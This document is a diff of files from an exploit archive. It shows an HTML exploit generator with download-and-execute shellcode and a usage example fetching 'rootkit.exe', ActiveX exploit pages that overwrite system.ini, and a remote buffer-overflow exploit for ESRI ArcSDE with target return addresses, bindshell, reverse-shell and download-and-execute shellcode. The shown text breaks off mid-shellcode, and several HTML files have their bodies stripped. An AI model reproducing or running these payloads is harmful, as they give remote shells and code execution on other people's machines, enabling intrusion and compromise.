+"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
+"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
+"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";
+   
+  
+char *url = NULL;
+unsigned char sc_2[] = "\x00\x98";
+  
+char * header =
+"\n"
+"\n"
+"\n"
+"\n"
+"\n"
+"\n";
+  
+// print unicode shellcode
+void PrintPayLoad(char *lpBuff, int buffsize)
+{
+int i;
+for(i=0;i [htmlfile]\n", argv[0]);
+ printf("\r\nE.g.: %s http://www.malwarehere.com/rootkit.exe exploit.html\r\n\n", argv[0]);
+ printf("=-Excepti0n-=\n");
+ exit(1);
+}
+  url = argv[1];
+  
+if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
+{
+printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
+return;
+}
+  printf("[+] download url:%s\n", url);
+  if(argc >=3) file = argv[2];
+printf("[+] exploit file:%s\n", file);
+  fp = fopen(file, "w");
+if(!fp)
+{
+printf("[-] Open file error!\n");
+return;
+}
+  
+//build Exploit HTML File
+fprintf(fp, "%s", header);
+fflush(fp);
+  memset(buf, 0, sizeof(buf));
+sc_len = sizeof(sc)-1;
+memcpy(buf, sc, sc_len);
+memcpy(buf+sc_len, url, strlen(url));
+  sc_len += strlen(url);
+  memcpy(buf+sc_len, sc_2, 1);
+sc_len += 1;
+  PrintPayLoad((char *)buf, sc_len);
+  fprintf(fp, "%s", footer);
+fflush(fp);
+  fprintf(fp, "%s", trigger_1);
+fflush(fp);
+  
+printf("[+] exploit write to %s success!\n", file);
+}
+  
+// =-Excepti0n-= 
+
+// milw0rm.com [2007-06-08]
diff --git a/platforms/windows/remote/4053.c b/platforms/windows/remote/4053.c
index b6376682f..5f78194c7 100755
--- a/platforms/windows/remote/4053.c
+++ b/platforms/windows/remote/4053.c
@@ -1,145 +1,145 @@
-/* 
-  Compile in LCC-win32 (Free!)
-  Download and exec any file you like!
-  Have Fun!
-  */ 
-
-#include 
-#include 
-#include 
-char *file = "Click_here.html";
-FILE *fp = NULL;
-   
-unsigned char sc[] =
-"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
-"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
-"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
-"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
-"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
-"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
-"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
-"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
-"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
-"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
-"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
-"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
-"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";
-   
-  
-char *url = NULL;
-unsigned char sc_2[] = "\x00\x98";
-  
-char * header =
-"\n"
-"\n"
-"\n"
-"\n"
-"\n"
-"\n";
-  
-// print unicode shellcode
-void PrintPayLoad(char *lpBuff, int buffsize)
-{
-int i;
-for(i=0;i [htmlfile]\n", argv[0]);
- printf("\r\nE.g.: %s http://www.malwarehere.com/rootkit.exe exploit.html\r\n\n", argv[0]);
- printf("=-Excepti0n-=\n");
-exit(1);
-}
-  url = argv[1];
-  
-if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
-{
-printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
-return;
-}
-  printf("[+] download url:%s\n", url);
-  if(argc >=3) file = argv[2];
-printf("[+] exploit file:%s\n", file);
-  fp = fopen(file, "w");
-if(!fp)
-{
-printf("[-] Open file error!\n");
-return;
-}
-  
-//build Exploit HTML File
-fprintf(fp, "%s", header);
-fflush(fp);
-  memset(buf, 0, sizeof(buf));
-sc_len = sizeof(sc)-1;
-memcpy(buf, sc, sc_len);
-memcpy(buf+sc_len, url, strlen(url));
-  sc_len += strlen(url);
-  memcpy(buf+sc_len, sc_2, 1);
-sc_len += 1;
-  PrintPayLoad((char *)buf, sc_len);
-  fprintf(fp, "%s", footer);
-fflush(fp);
-  fprintf(fp, "%s", trigger_1);
-fflush(fp);
-  
-printf("[+] exploit write to %s success!\n", file);
-}
-
-// =-Excepti0n-= 
-
-// milw0rm.com [2007-06-08]
+/* 
+  Compile in LCC-win32 (Free!)
+  Download and exec any file you like!
+  Have Fun!
+  */ 
+
+#include 
+#include 
+#include 
+char *file = "Click_here.html";
+FILE *fp = NULL;
+   
+unsigned char sc[] =
+"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
+"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
+"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
+"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
+"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
+"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
+"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
+"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
+"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
+"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
+"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
+"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
+"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";
+   
+  
+char *url = NULL;
+unsigned char sc_2[] = "\x00\x98";
+  
+char * header =
+"\n"
+"\n"
+"\n"
+"\n"
+"\n"
+"\n";
+  
+// print unicode shellcode
+void PrintPayLoad(char *lpBuff, int buffsize)
+{
+int i;
+for(i=0;i [htmlfile]\n", argv[0]);
+ printf("\r\nE.g.: %s http://www.malwarehere.com/rootkit.exe exploit.html\r\n\n", argv[0]);
+ printf("=-Excepti0n-=\n");
+exit(1);
+}
+  url = argv[1];
+  
+if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
+{
+printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
+return;
+}
+  printf("[+] download url:%s\n", url);
+  if(argc >=3) file = argv[2];
+printf("[+] exploit file:%s\n", file);
+  fp = fopen(file, "w");
+if(!fp)
+{
+printf("[-] Open file error!\n");
+return;
+}
+  
+//build Exploit HTML File
+fprintf(fp, "%s", header);
+fflush(fp);
+  memset(buf, 0, sizeof(buf));
+sc_len = sizeof(sc)-1;
+memcpy(buf, sc, sc_len);
+memcpy(buf+sc_len, url, strlen(url));
+  sc_len += strlen(url);
+  memcpy(buf+sc_len, sc_2, 1);
+sc_len += 1;
+  PrintPayLoad((char *)buf, sc_len);
+  fprintf(fp, "%s", footer);
+fflush(fp);
+  fprintf(fp, "%s", trigger_1);
+fflush(fp);
+  
+printf("[+] exploit write to %s success!\n", file);
+}
+
+// =-Excepti0n-= 
+
+// milw0rm.com [2007-06-08]
diff --git a/platforms/windows/remote/4060.html b/platforms/windows/remote/4060.html
index b243b28e1..f1eaf40a7 100755
--- a/platforms/windows/remote/4060.html
+++ b/platforms/windows/remote/4060.html
@@ -1,44 +1,44 @@
-
    ------------------------------------------------------------------------------------------------------------------
- TEC-IT TBarCode OCX ActiveX Control (TBarCode7.ocx v. 7.0.2.3524) "SaveImage()" Remote Arbitrary File Overwrite
- url: http://www.tec-it.com/asp/main/startfr.asp?LN=1
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not be responsible for any damage.
- 
- THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
- IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- all software that use this ocx are vulnerable to this exploits.
------------------------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-06-12]
+
    +-----------------------------------------------------------------------------------------------------------------
+ TEC-IT TBarCode OCX ActiveX Control (TBarCode7.ocx v. 7.0.2.3524) "SaveImage()" Remote Arbitrary File Overwrite
+ url: http://www.tec-it.com/asp/main/startfr.asp?LN=1
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not be responsible for any damage.
+ 
+ THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
+ IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to this exploits.
+-----------------------------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-06-12]
diff --git a/platforms/windows/remote/4061.html b/platforms/windows/remote/4061.html
index 1247cd5ab..350fee546 100755
--- a/platforms/windows/remote/4061.html
+++ b/platforms/windows/remote/4061.html
@@ -1,30 +1,30 @@
-
-
-
-process.init(file);process.run(true,{},0);alert(process)
-
-
-# milw0rm.com [2007-06-12]
+
+
+
+process.init(file);process.run(true,{},0);alert(process)
+
+
+# milw0rm.com [2007-06-12]
diff --git a/platforms/windows/remote/4109.html b/platforms/windows/remote/4109.html
index f3f7d23c2..7872a5632 100755
--- a/platforms/windows/remote/4109.html
+++ b/platforms/windows/remote/4109.html
@@ -1,44 +1,44 @@
-
    ---------------------------------------------------------------------------------------------------
- NCTAudioStudio2 ActiveX DLL (NCTWavChunksEditor2.dll v. 2.6.1.148) "CreateFile()"Insecure Method
- url: http://www.nctsoft.com/products/NCTAudioEditor2/
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not be responsible for any damage.
- 
- THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
- IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- all software that use this ocx (for example Sienzo DMM) are vulnerable to this exploits.
---------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-06-26]
+
    +--------------------------------------------------------------------------------------------------
+ NCTAudioStudio2 ActiveX DLL (NCTWavChunksEditor2.dll v. 2.6.1.148) "CreateFile()"Insecure Method
+ url: http://www.nctsoft.com/products/NCTAudioEditor2/
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not be responsible for any damage.
+ 
+ THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
+ IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx (for example Sienzo DMM) are vulnerable to this exploits.
+--------------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-06-26]
diff --git a/platforms/windows/remote/4119.html b/platforms/windows/remote/4119.html
index 1e7292dcc..76f62d4f0 100755
--- a/platforms/windows/remote/4119.html
+++ b/platforms/windows/remote/4119.html
@@ -1,79 +1,79 @@
-:. GOODFELLAS Security Research TEAM  .:
-:. http://goodfellas.shellcode.com.ar .:
-
-
-
-
-Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write
-
-
-
    Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write

    
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-06-27]
+:. GOODFELLAS Security Research TEAM  .:
+:. http://goodfellas.shellcode.com.ar .:
+
+
+
+
+Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write
+
+
+
    Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write

    
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2007-06-27]
diff --git a/platforms/windows/remote/4123.html b/platforms/windows/remote/4123.html
index d8fb649e0..f8b5c9672 100755
--- a/platforms/windows/remote/4123.html
+++ b/platforms/windows/remote/4123.html
@@ -1,60 +1,60 @@
-
-
-
-
-
-
-# milw0rm.com [2007-06-28]
+
+
+
+
+
+
+# milw0rm.com [2007-06-28]
diff --git a/platforms/windows/remote/4146.cpp b/platforms/windows/remote/4146.cpp
index 89d18a53c..4fc8538c4 100755
--- a/platforms/windows/remote/4146.cpp
+++ b/platforms/windows/remote/4146.cpp
@@ -1,793 +1,793 @@
-/* Dreatica-FXP crew
-* 
-* ----------------------------------------
-* Target         : ESRI ArcSDE 9.0 - 9.2sp1 
-* Site           : http://www.esri.com
-* Found by       : iDefense, http://labs.idefense.com/intelligence/vulnerabilities/
-* ----------------------------------------
-* Exploit        : ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow exploit
-* Exploit date   : 26.06.2007
-* Exploit writer : Heretic2 (heretic2x@gmail.com)
-* OS             : Windows ALL 
-* Crew           : Dreatica-FXP
-* ----------------------------------------
-* Info           :   Trivially exploitable stack overflow vulnerability: if we send more than 516 bytes to 
-*                  server, we can overwrite EIP. After the EIP gets overwritten we can see that the ESP 
-*                  points to the next bytes of buffer after EIP, so we simply write shellcode at 520 byte.
-*                  The server allows any type of buffer even with the 0x00 bytes, so have fun!
-*                  For use universal RET's you need to find the ArcSDE version (this is not a trivial job :P) 
-*
-*                    Seems that the earlier versions are also vulnerable. To protect the server against that
-*                  vulnerability you need to install ArcSDE 9.2sp2.
-* ----------------------------------------
-* Compiling      :
-*  To compile this exploit you need:
-*    1. Windows C/C++ compiler   
-*    2. WinSock 2
-* ----------------------------------------
-* Thanks to      :
-*       1. iDefense                    ( http://labs.idefense.com/intelligence/vulnerabilities/ )
-*       2. The Metasploit project      ( http://metasploit.com                                  ) 
-*       3. ALPHA 2: Zero-tolerance     (                         ) 
-*       4. anghell at Dreatica-FXP     (                                                        )
-*       5. Dreatica-FXP crew           ( http://www.dreatica.cl                                 )
-* ----------------------------------------
-* This exploit was written for educational purpose only. Use it at your own risk. Author will be not be 
-* responsible for any damage, caused by that code.
-************************************************************************************
-*/
-
-#include 
-#include 
-#include 
-#include 
-#include 
-#pragma comment(lib,"ws2_32")
-
-
-void usage(char * s);
-void logo();
-void end_logo();
-void prepare_shellcode(unsigned char * fsh, int sh, char * cbip, int cbport, char * url);
-void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh, char * cbip, int cbport, char * url);
-int get_version(char * remotehost, int port);
-int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port);
-SOCKET do_connect (char *remotehost, int port);
-SOCKET do_connect_async (char *remotehost, int port);
-int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded );
-
-static long timeout = 2000 ; // 2 sec
-
-
-// -----------------------------------------------------------------
-// XGetopt.cpp  Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring);
-char	*optarg;		// global argument pointer
-int		optind = 0, opterr; 	// global argv index
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-
-struct _target{
-	const char *t ;
-	unsigned long ret ;	
-} targets[]=
-		{
-			{"UNIV: AcrSDE 9.0 [sdesqlsrvr90.dll] ( MSSQL )",  0x1015c357 },// jmp esp
-			{"UNIV: AcrSDE 9.1 [sdesqlsrvr91.dll] ( MSSQL )",  0x1015e3e7 },// jmp esp
-			{"UNIV: AcrSDE 9.2 [sdesqlsrvr92.dll] ( MSSQL )",  0x1008d742 },// jmp esp			
-			{"Windows XP   SP0 RUSSIAN [shell32.dll]",         0x77a96758 },// jmp esp
-			{"Windows XP   SP1 RUSSIAN [advapi32.dll]",        0x77e1d9d3 },// jmp esp
-			{"Windows XP   SP2 RUSSIAN [shell32.dll]",         0x7d16817f },// jmp esp
-			{"Windows XP   SP2 ENGLISH [ole32.dll]",           0x77548952 },// jmp esp
-			{"Windows XP   SP2 DUTCH   [ntdll.dll]",           0x7c941eed },// jmp esp
-			{"Windows 2003 SP0 ENGLISH [shell32.dll]",         0x77add723 },// jmp esp
-			{"Debug / DoS",                                    0x42424242 },
-			{NULL,										       0x00000000 }
-		};
-
-
-struct {
-	const char * name;
-	int length;
-	char * shellcode;	
-}shellcodes[]={ 	
-	 {"Bindshell, port 4444   [ args: none ]", 696, 
-		 /* win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
-		"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49"
-		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
-		"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32"
-		"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62"
-		"\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71"
-		"\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c"
-		"\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47"
-		"\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35"
-		"\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c"
-		"\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a"
-		"\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a"
-		"\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64"
-		"\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34"
-		"\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50"
-		"\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64"
-		"\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31"
-		"\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69"
-		"\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30"
-		"\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78"
-		"\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f"
-		"\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73"
-		"\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e"
-		"\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62"
-		"\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71"
-		"\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65"
-		"\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32"
-		"\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e"
-		"\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69"
-		"\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79"
-		"\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d"
-		"\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49"
-		"\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70"
-		"\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45"
-		"\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36"
-		"\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32"
-		"\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e"
-		"\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50"
-		"\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32"
-		"\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a"
-		"\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48"
-		"\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30"
-		"\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39"
-		"\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b"
-		"\x4f\x6a\x76\x6b\x4f\x78\x50\x42"
-	 },
-
-	  
-	 {"ReverseShell           [ args: -I  -P  ]", 316,
-		"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA"
-		"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
-		"\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49"
-		"\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC2\xC2\xC2"
-		"\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x96\x3D\xD4\x49"
-		"\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x2E\x52\xC3\xC2"
-		"\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x92\x92\x82\x92"
-		"\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\xAA\xC0\xC2\xC2"
-		"\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\xB7\x88\xAA\xA1"
-		"\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x96\x4F\xFE\xE6\xA8\xD7\x9B\x69"
-		"\x20\x3F\x04\x86\xE6\xD2\x86\x3C\x86\xE6\xFF\x4B\x9E\xE6\x8A\x4B"
-		"\x9E\xE6\x8E\x4B\x9E\xE6\x92\x4F\x86\xE6\xD2\x96\x92\x93\x93\x93"
-		"\xA8\xC3\x93\x93\x3D\xB4\xF2\x93\x3D\x94\xC6\x49\x0E\xA8\x3D\x3D"
-		"\xF3\x3D\x94\xCA\x91\x3D\x94\xDE\x3D\x94\xCE\x93\x94\x49\x87\xFE"
-		"\x49\x96\xEA\xBA\xC1\x17\x90\x49\xB0\xE2\xC1\x37\xF1\x0B\x8B\x83"
-		"\x6F\xC1\x07\xF1\x19\xCD\x7C\xD2\xF8\x14\xB6\xCA\x03\x09\xCF\xC1"
-		"\x18\x82\x29\x33\xF9\xDD\xB7\x25\x98\x49\x98\xE6\xC1\x1F\xA4\x49"
-		"\xCE\x89\x49\x98\xDE\xC1\x1F\x49\xC6\x49\xC1\x07\x69\x9C\x9B\x01"
-		"\x2A\xC2\x3D\x3D\x3D\x4C\x8C\xCC\x2E\xB0\x3C\x71\xD4\x6F\x1B\xC7"
-		"\x0C\xBC\x1A\x20\xB1\x09\x2F\x3E\xF9\x1B\xCB\x37\x6F\x2E\x3B\x68"
-		"\xA2\x25\xBB\x04\xBB"
-	},
-	 {"Download and execute   [ args: -u  ]", 729,
-		/* win32_download_exec - http://metasploit.com */
-		/* encoded by "ALPHA 2: Zero-tolerance.  */
-		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
-		"\x49\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51"
-		"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
-		"\x75\x4A\x49\x58\x6B\x36\x70\x71\x4A\x33\x7A\x76\x53\x59\x59\x71"
-		"\x76\x38\x39\x57\x4C\x35\x51\x6B\x30\x74\x74\x74\x4A\x6E\x79\x39"
-		"\x72\x7A\x5A\x78\x6B\x36\x65\x4D\x38\x7A\x4B\x4B\x4F\x4B\x4F\x4B"
-		"\x4F\x54\x30\x50\x4C\x4E\x79\x6C\x59\x5A\x39\x4F\x33\x79\x6D\x55"
-		"\x68\x6C\x69\x5A\x39\x4E\x79\x4A\x39\x34\x52\x58\x59\x6E\x75\x54"
-		"\x52\x4B\x59\x6D\x55\x36\x54\x45\x42\x7A\x79\x6F\x61\x56\x72\x53"
-		"\x71\x34\x52\x5A\x4A\x6D\x75\x76\x72\x4A\x4D\x4E\x67\x4D\x31\x6F"
-		"\x6A\x72\x4A\x36\x72\x6B\x57\x4E\x59\x4F\x6A\x33\x52\x76\x72\x6E"
-		"\x37\x4C\x4D\x6F\x5A\x74\x34\x7A\x6F\x48\x4E\x79\x58\x55\x42\x4D"
-		"\x76\x4C\x5A\x73\x52\x74\x52\x32\x4B\x6B\x43\x4C\x57\x49\x50\x52"
-		"\x4A\x75\x6F\x7A\x4D\x4A\x31\x69\x50\x59\x56\x54\x5A\x51\x4E\x4F"
-		"\x6D\x69\x4C\x33\x4B\x64\x30\x4B\x70\x6F\x36\x6B\x77\x54\x52\x73"
-		"\x64\x62\x32\x79\x4F\x4D\x6D\x6E\x7A\x70\x5A\x73\x78\x70\x78\x4F"
-		"\x6A\x62\x78\x6D\x7A\x50\x50\x4B\x4F\x75\x42\x4A\x31\x75\x42\x4B"
-		"\x6F\x6F\x75\x4D\x4A\x61\x4A\x52\x78\x52\x58\x4D\x4B\x6E\x7A\x50"
-		"\x58\x66\x72\x4D\x49\x6D\x4A\x51\x4A\x56\x72\x55\x33\x62\x32\x50"
-		"\x6E\x55\x4A\x51\x4F\x4E\x77\x75\x42\x63\x79\x49\x63\x4D\x4D\x39"
-		"\x50\x32\x51\x4B\x79\x4D\x49\x6D\x49\x6E\x79\x76\x7A\x51\x4F\x4C"
-		"\x54\x68\x4B\x78\x4F\x71\x76\x6A\x6E\x55\x35\x59\x53\x77\x62\x53"
-		"\x71\x4B\x43\x4E\x78\x39\x50\x31\x61\x59\x34\x4D\x49\x4C\x59\x6E"
-		"\x79\x46\x7A\x71\x4F\x6F\x7A\x6A\x6F\x69\x4F\x74\x59\x4D\x77\x77"
-		"\x69\x78\x6C\x73\x53\x37\x69\x6E\x4F\x37\x69\x7A\x67\x75\x4A\x73"
-		"\x45\x6E\x59\x75\x42\x71\x55\x6B\x43\x78\x39\x4B\x7A\x45\x36\x68"
-		"\x4E\x73\x45\x31\x4E\x6D\x4D\x4F\x6A\x39\x55\x79\x68\x6E\x57\x4B"
-		"\x4C\x51\x4E\x6B\x6D\x4F\x6A\x4D\x4D\x38\x61\x79\x6C\x6C\x59\x6A"
-		"\x39\x4F\x5A\x70\x59\x4B\x79\x79\x59\x6A\x6A\x4A\x6F\x39\x59\x73"
-		"\x56\x48\x4E\x53\x55\x55\x42\x71\x55\x6B\x79\x6A\x6A\x50\x66\x48"
-		"\x4E\x65\x39\x6A\x69\x65\x36\x78\x4E\x50\x6D\x6F\x5A\x52\x79\x30"
-		"\x35\x35\x4C\x50\x59\x4A\x4C\x31\x70\x58\x48\x78\x4B\x78\x4F\x6A"
